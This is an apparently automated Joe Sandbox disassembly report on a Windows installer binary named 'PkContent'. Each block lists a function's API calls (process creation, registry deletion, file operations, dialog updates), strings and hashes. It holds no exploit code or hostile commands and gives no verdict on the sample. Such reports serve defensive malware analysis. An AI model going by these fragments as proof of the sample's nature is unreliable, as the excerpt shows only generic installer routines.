                                                • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                APIs
                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                  • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                  • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                Strings
                                                • Exec: success ("%s"), xrefs: 00402263
                                                • Exec: command="%s", xrefs: 00402241
                                                • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                • API String ID: 2014279497-3433828417
                                                • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                • GetMessagePos.USER32 ref: 00404871
                                                • ScreenToClient.USER32(?,?), ref: 00404889
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                • MulDiv.KERNEL32(00029A00,00000064,?), ref: 00403295
                                                • wsprintfW.USER32 ref: 004032A5
                                                • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                Strings
                                                • verifying installer: %d%%, xrefs: 0040329F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                APIs
                                                • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                • wsprintfW.USER32 ref: 00404457
                                                • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s$@rD
                                                • API String ID: 3540041739-1813061909
                                                • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                APIs
                                                • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: *?|<>/":
                                                • API String ID: 589700163-165019052
                                                • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Close$DeleteEnumOpen
                                                • String ID:
                                                • API String ID: 1912718029-0
                                                • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                APIs
                                                • GetDlgItem.USER32(?), ref: 004020A3
                                                • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                • DeleteObject.GDI32(00000000), ref: 004020EE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                APIs
                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                APIs
                                                  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                Strings
                                                • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                • API String ID: 1697273262-1764544995
                                                • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00404902
                                                • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                  • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID: $@rD
                                                • API String ID: 3748168415-881980237
                                                • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                APIs
                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                  • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                • lstrlenW.KERNEL32 ref: 004026B4
                                                • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
